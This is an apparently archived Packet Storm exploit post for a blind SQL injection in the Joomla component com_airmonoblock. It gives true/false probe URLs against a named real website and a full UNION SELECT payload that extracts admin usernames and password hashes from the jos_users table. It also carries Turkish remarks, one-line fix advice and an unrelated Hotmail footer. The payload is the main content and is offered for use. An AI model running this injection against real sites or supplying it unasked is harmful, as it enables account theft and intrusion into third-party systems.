Joomla Airmonoblock Blind SQL Injection

2009-12-30T00:00:00
ID PACKETSTORM:84516
Type packetstorm
Reporter Fl0riX
Modified 2009-12-30T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
  
#############################################################  
# Joomla Component com_airmonoblock Blind SQL Injection Vulnerability   
#############################################################  
  
# Author : Pyske  
  
# Home : www.cyber-warrior.org  
  
# Greetz : Fl0riX , M-K-A and All Cyber-Warrior  
  
# Name : com_airmonoblock  
  
# Bug Type : Blind SQL Injection  
  
# Infection : Admin login bilgileri al?nabilir.  
  
# Demo Vuln. :  
TRUE(+)  
http://www.air2guide.com/index2.php?option=com_airmonoblock&task=focus&id=1 and 1=1  
FALSE(-)  
http://www.air2guide.com/index2.php?option=com_airmonoblock&task=focus&id=1 and 1=0  
  
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
path/ index2.php?option=com_airmonoblock&task=focus&id=1/**/and/**/1=0/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--  
  
< -- bug code end of -- >  
  
_________________________________________________________________  
Windows Live Hotmail: Arkadaþlarýnýz Facebook'taki güncellemelerinizi doðrudan Hotmail®'den alýr.  
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009`